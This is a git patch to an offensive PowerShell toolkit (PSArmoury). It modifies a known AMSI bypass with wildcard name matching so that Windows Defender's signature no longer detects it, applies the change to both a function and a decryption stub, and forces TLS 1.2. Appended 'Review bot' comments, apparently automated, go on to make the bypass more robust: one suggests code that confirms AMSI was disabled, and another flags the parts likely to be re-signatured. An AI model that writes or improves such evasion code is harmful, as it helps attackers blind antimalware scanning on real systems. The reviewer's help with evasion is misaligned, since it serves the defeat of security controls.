From 631e8de3989e1ebf4d4e3232c093522989d1094c Mon Sep 17 00:00:00 2001
From: Christoph Falta
Date: Wed, 5 Sep 2018 14:58:05 +0200
Subject: [PATCH] Small changes regarding AMSI and Net.Webclient
-) Windows Defender now detects the famous one-line-amsi-bypass by Matthew Graeber so I added a small modification to make it work again
-) Fixed an issue with SSL/TLS negotiation mismatch when using the Net.Webclient to access Github. Will now always use Tls1.2.
---
 New-PSArmoury.ps1 | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/New-PSArmoury.ps1 b/New-PSArmoury.ps1
index 6564168..6e423e0 100644
--- a/New-PSArmoury.ps1
+++ b/New-PSArmoury.ps1
@@ -153,8 +153,8 @@ function Disable-AMSI
 {
 try
 {
- #AMSI Bypass by Matthew Graeber
- [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)
+ #AMSI Bypass by Matthew Graeber - altered a bit because Windows Defender now has a signature for the original one
+ (([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*tils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
 }
 catch
 {
@@ -185,8 +185,8 @@ $DecryptionStub=@"
 if(`$Password -and `$Salt)
 {
-#AMSI Bypass by Matthew Graeber
-[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue(`$null,`$true)
+#AMSI Bypass by Matthew Graeber - altered a bit because Windows Defender now has a signature for the original one
+(([Ref].Assembly.gettypes() | where {`$_.Name -like "Amsi*tils"}).GetFields("NonPublic,Static") | where {`$_.Name -like "amsiInit*ailed"}).SetValue(`$null,`$true)
 `$Index = 0
 foreach(`$ef in `$EncryptedFunctions)
@@ -456,6 +456,8 @@ if($ScriptRequirements)
 $global:GitHubCredentials = $null
 $global:UserAgent = "Anything"
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+
 foreach($PSA in $PSArmouryConfig)
 {
 switch($PSA.Type)
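Review bot: The wildcard lookup on the new `+` line in Disable-AMSI has no null or multi-match check: if no type matches `Amsi*tils` (or more than one does), the chained `.GetFields(...)`/`.SetValue(...)` fails with a generic method-invocation error that lands in the catch block outside this hunk, so whether AMSI was actually disabled depends on what that catch does rather than on an explicit result. Binding the field first and reading it back after the write makes the outcome unambiguous, e.g. `$f = ([Ref].Assembly.GetTypes() | ? {$_.Name -like "Amsi*tils"} | select -First 1).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"} | select -First 1`, `$f.SetValue($null,$true)`, `if(-not $f -or -not $f.GetValue($null)){ Write-Warning "AMSI bypass did not take effect" }`. A comment would also help the next maintainer, since only the literal type and field names changed while the `GetFields("NonPublic,Static")`/`SetValue($null,$true)` tail is still a fixed pattern that can presumably be re-signatured: `# evasion is textual only (wildcarded names); expect to revisit when re-signatured`. The catch block of Disable-AMSI continues outside the hunk.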
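Review bot: This copy of the bypass inside the `$DecryptionStub` here-string now diverges from the one in Disable-AMSI (`where` here, `?` there) and both embed the same hard-coded match strings, so the next Defender signature has to be chased in two places; defining the line once in a variable and splicing it into both the function and the here-string, or at least a comment above this line such as `# keep in sync with the copy in Disable-AMSI`, would stop the two from drifting. Unlike the function copy, nothing in the visible lines wraps this call in try/catch, so a `$null` from the wildcard type or field lookup throws in the generated stub and stops it before `` `$Index = 0 `` runs, which may or may not be the intended fail-closed behaviour. The here-string and the enclosing `if` block continue outside the hunk.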
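Review bot: The new `[Net.ServicePointManager]::SecurityProtocol` assignment replaces the process-wide protocol set rather than adding to it, which silently drops anything already enabled in the session (e.g. a newer TLS version on frameworks that support it) for every subsequent .NET web request, not just the GitHub fetch. Prefer OR-ing the flag in: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. The side effect deserves a comment regardless: `# process-wide: affects every Net.WebClient/HttpWebRequest for the rest of the session`. On .NET Framework builds that lack the `Tls12` enum member this line would throw at parse time; if such hosts are in scope, `[Net.SecurityProtocolType]3072` avoids the name lookup — confirm the supported minimum. The enclosing `if($ScriptRequirements)` block starts outside the hunk.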